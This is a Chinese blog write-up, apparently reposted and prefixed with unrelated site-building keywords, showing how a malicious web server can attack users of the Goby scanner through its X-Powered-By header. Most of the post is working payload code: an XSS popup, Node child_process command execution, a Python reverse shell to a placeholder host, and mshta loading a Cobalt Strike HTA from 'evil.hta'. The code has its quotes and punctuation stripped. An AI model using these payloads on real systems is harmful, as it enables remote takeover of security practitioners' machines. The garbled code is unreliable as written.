广东网站建设网,顺企网上海网站建设,做 58 那样的网站,wordpress 发布 工具若结局非我所愿#xff0c;那就在尘埃落定前奋力一搏。
本文首发于先知社区#xff0c;原创作者即是本人
一、弹xss
为了方便#xff0c;本次直接使用 PhpStudy 进行建站#xff0c;开启的web服务要为MySQLNginx#xff0c;这里的 PhpStudy 地址为 http://x.x.x.x…若结局非我所愿那就在尘埃落定前奋力一搏。
本文首发于先知社区原创作者即是本人
一、弹xss
为了方便本次直接使用 PhpStudy 进行建站开启的web服务要为MySQLNginx这里的 PhpStudy 地址为 http://x.x.x.x直接将 Web 服务里的 index.php 改为以下内容
?php
header(X-Powered-By: PHP/img src1 onerroralert(\xxxxx\));
?Goby 在扫描到 http://x.x.x.x 后可以看到PHP的版本信息已经变为我们的xss弹窗的payload点击扫描结果里的x.x.x.x 就会成功触发弹窗 二、弹计算器
复现 RCE 需要再新建一个 js 文件在 x.x.x.x 的 www 目录下新建了一个名为 calc 的 js 文件js 内容如下 js文件在goby客户端的chrome里如果同名只会第一次去请求后面就缓存起来了在测试的时候修改js文件内容没有效果要同时修改内容和文件名
(function(){
require(child_process).exec(calc);
})()执行这段 JS 会打开Goby所在主机的计算器 之后将 index.php 的内容修改如下
?php
header(X-Powered-By: PHP/img src1 onerrorimport(unescape(http%3A//x.x.x.x/calc.js)));
?Goby 在扫描到 http://x.x.x.x 后可以看到PHP的版本信息已经变为我们的调用js文件的payload点击扫描结果里的 x.x.x.x 的详细信息 成功反弹 计算器 三、反弹shell
复现 RCE 需要再新建一个 js 文件在 x.x.x.x 的 www 目录下新建了一个名为 shell 的 js 文件js 内容如下
(function(){
require(child_process).exec(python -c \import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((x.x.x.x,xxx));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/bash,-i]);\);
})()执行这段 JS 会利用 Python 反弹 Shell 到 x.x.x.x 主机的 xxx 端口 之后将 index.php 的内容修改如下
?php
header(X-Powered-By: PHP/img src1 onerrorimport(unescape(http%3A//x.x.x.x/shell.js)));
?在x.x.x.x 主机的 xxx 端口开启监听 nc -lvp xxx Goby 在扫描到 http://x.x.x.x 后可以看到PHP的版本信息已经变为我们的调用js文件的payload点击扫描结果里的 x.x.x.x 的详细信息 成功反弹 shell 四、上线cs
首先cs生成VBA或者powershell的Hta程序并且放到自己的公网服务器上 上线cs 需要再新建一个 js 文件在 x.x.x.x 的 www 目录下新建了一个名为 1 的 js 文件js 内容如下
(function(){
require(child_process).exec(mshta http://x.x.x.x/evil.hta);
})();执行这段 JS 会利用Goby所在主机的mshta.exe执行cs生成的VBA的Hta程序 也可以利用文件下载功能使用cs所在的服务器进行加载 需要将 js 内容修改为
(function(){
require(child_process).exec(mshta http://x.x.x.x/download/file.ext);
})();之后将 index.php 的内容修改如下
?php
header(X-Powered-By: PHP/img src1 onerrorimport(unescape(http%3A//x.x.x.x/1.js)));
?Goby 在扫描到 http://x.x.x.x 后可以看到PHP的版本信息已经变为我们的调用js文件的payload点击扫描结果里的 x.x.x.x 的详细信息 经测试cs生成VBA的Hta程序Windows 10 企业版可以上线 经测试cs生成powershell的Hta程序Windows 7 企业版和Windows 10 企业版可以上线 网络安全感悟
做网络安全是一个长期的过程因为做网络安全没有终点不管是网络安全企业还是在网络安全行业各种不同方向的从业人员不管你选择哪个方向只有在这条路上坚持不懈才能在这条路上走的更远走的更好不然你肯定走不远迟早会转行或者被淘汰把时间全浪费掉。如果你觉得自己是真的热爱网络安全这个行业坚持走下去就可以了不用去管别人现在就是一个大浪淘金的时代淘下去的是沙子留下来的才是金子正所谓千淘万漉虽辛苦吹尽狂沙始到金网络安全的路还很长一生只做一件事坚持做好一件事
文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。
免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。
转载声明各家兴 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。
CSDN:
https://blog.csdn.net/weixin_48899364?typeblog公众号
https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirect博客:
https://rdyx0.github.io/先知社区
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
